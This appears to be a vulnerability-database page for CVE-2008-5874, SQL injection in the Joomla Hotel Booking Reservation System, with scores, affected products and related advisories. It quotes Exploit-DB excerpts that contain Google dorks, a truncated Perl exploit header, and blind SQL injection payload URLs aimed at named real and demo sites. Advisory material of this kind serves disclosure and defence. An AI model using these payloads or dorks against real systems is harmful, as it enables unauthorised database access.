CVE-2008-5874
published 2009-01-08CVE-2008-5874: Multiple SQL injection vulnerabilities in the Hotel Booking Reservation System (aka HBS) for Joomla! allow remote attackers to execute arbitrary SQL commands…
PriorityP339high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.97%
57.6th percentile
Multiple SQL injection vulnerabilities in the Hotel Booking Reservation System (aka HBS) for Joomla! allow remote attackers to execute arbitrary SQL commands via the id parameter in a showhoteldetails action to index.php in the (1) com_allhotels or (2) com_5starhotels module. NOTE: some of these details are obtained from third party information.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomlahbs | com_5starhotels | — | — |
| joomlahbs | com_allhotels | — | — |
| joomlahbs | hotel_booking_reservation_system | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-7c3f-rp75-mw4v: Multiple SQL injection vulnerabilities in the Hotel Booking Reservation System (aka HBS) for Joomla! allow remote attackers to execute arbitrary SQL c
ghsa_unreviewed·2022-05-17
CVE-2008-5874 [HIGH] CWE-89 GHSA-7c3f-rp75-mw4v: Multiple SQL injection vulnerabilities in the Hotel Booking Reservation System (aka HBS) for Joomla! allow remote attackers to execute arbitrary SQL c
Multiple SQL injection vulnerabilities in the Hotel Booking Reservation System (aka HBS) for Joomla! allow remote attackers to execute arbitrary SQL commands via the id parameter in a showhoteldetails action to index.php in the (1) com_allhotels or (2) com_5starhotels module. NOTE: some of these details are obtained from third party information.
GHSA
GHSA-p29x-jjv6-hfrh: Multiple SQL injection vulnerabilities in the Hotel Booking Reservation System (aka HBS or com_hbssearch) component for Joomla! allow remote attackers
ghsa_unreviewed·2022-05-02·CVSS 7.5
CVE-2009-3357 [HIGH] CWE-89 GHSA-p29x-jjv6-hfrh: Multiple SQL injection vulnerabilities in the Hotel Booking Reservation System (aka HBS or com_hbssearch) component for Joomla! allow remote attackers
Multiple SQL injection vulnerabilities in the Hotel Booking Reservation System (aka HBS or com_hbssearch) component for Joomla! allow remote attackers to execute arbitrary SQL commands via the (1) h_id, (2) id, and (3) rid parameters to longDesc.php, and the h_id parameter to (4) detail.php, (5) detail1.php, (6) detail2.php, (7) detail3.php, (8) detail4.php, (9) detail5.php, (10) detail6.php, (11) detail7.php, and (12) detail8.php, different vectors than CVE-2008-5865, CVE-2008-5874, and CVE-2008-5875.
No detection rules found.
Exploit-DB
Joomla! Component 5starhotels - SQL Injection
exploitdb·2008-12-24
CVE-2008-5875 Joomla! Component 5starhotels - SQL Injection
Joomla! Component 5starhotels - SQL Injection
---
#!/usr/bin/perl -w
#Joomla com_5starhotels Sql injection#
########################################
#[~] Author : EcHoLL
#[~] www.warezturk.org www.tahribat.com
#[~] Greetz : Black_label TURK Godlike Nitrous
#[!] Module_Name: com_5starhotels
#[!] Script_Name: Joomla
#[!] Google_Dork: inurl:"com_5starhotels"
########################################
system("color FF0000");
system("Nohacking");
print "\t\t-------------------------------------------------------------\n\n";
print "\t\t| Turkish Securtiy Team |\n\n";
print "\t\t-------------------------------------------------------------\n\n";
print "\t\t|Joomla Module com_5starhotels(showhoteldetails&id=)Remote SQL Injection Vuln|\n\n";
print "\t\t| Coded by: EcHoLL www.warezturk.org |\n\
Exploit-DB
Joomla! Component com_lowcosthotels - Blind SQL Injection
exploitdb·2008-12-23
CVE-2008-5875 Joomla! Component com_lowcosthotels - Blind SQL Injection
Joomla! Component com_lowcosthotels - Blind SQL Injection
---
Joomla Component com_lowcosthotels (id) Blind SQL Injection Vulnerability
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
script : http://www.joomlahbs.com/
DorK : inurl:index.php?option=com_lowcosthotels
Demo :
http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5
http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=4
or
http://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5
http://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@
Exploit-DB
Joomla! Component com_allhotels - Blind SQL Injection
exploitdb·2008-12-23
CVE-2008-5875 Joomla! Component com_allhotels - Blind SQL Injection
Joomla! Component com_allhotels - Blind SQL Injection
---
Joomla Component com_allhotels (id) Blind SQL Injection Vulnerability
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
script : http://www.joomlahbs.com/ & http://www.leveltensolutions.net/spa/
DorK : inurl:index.php?option=com_allhotels
Demo :
http://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=5
http://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=4
____________________________( Greetz )_________________________________
|
| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC |
|
| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
|
| Ghost Hacker | FA
No writeups or analysis indexed.
http://downloads.securityfocus.com/vulnerabilities/exploits/32952.plhttp://www.securityfocus.com/bid/32952https://www.exploit-db.com/exploits/7568https://www.exploit-db.com/exploits/7575http://downloads.securityfocus.com/vulnerabilities/exploits/32952.plhttp://www.securityfocus.com/bid/32952https://www.exploit-db.com/exploits/7568https://www.exploit-db.com/exploits/7575
2009-01-08
Published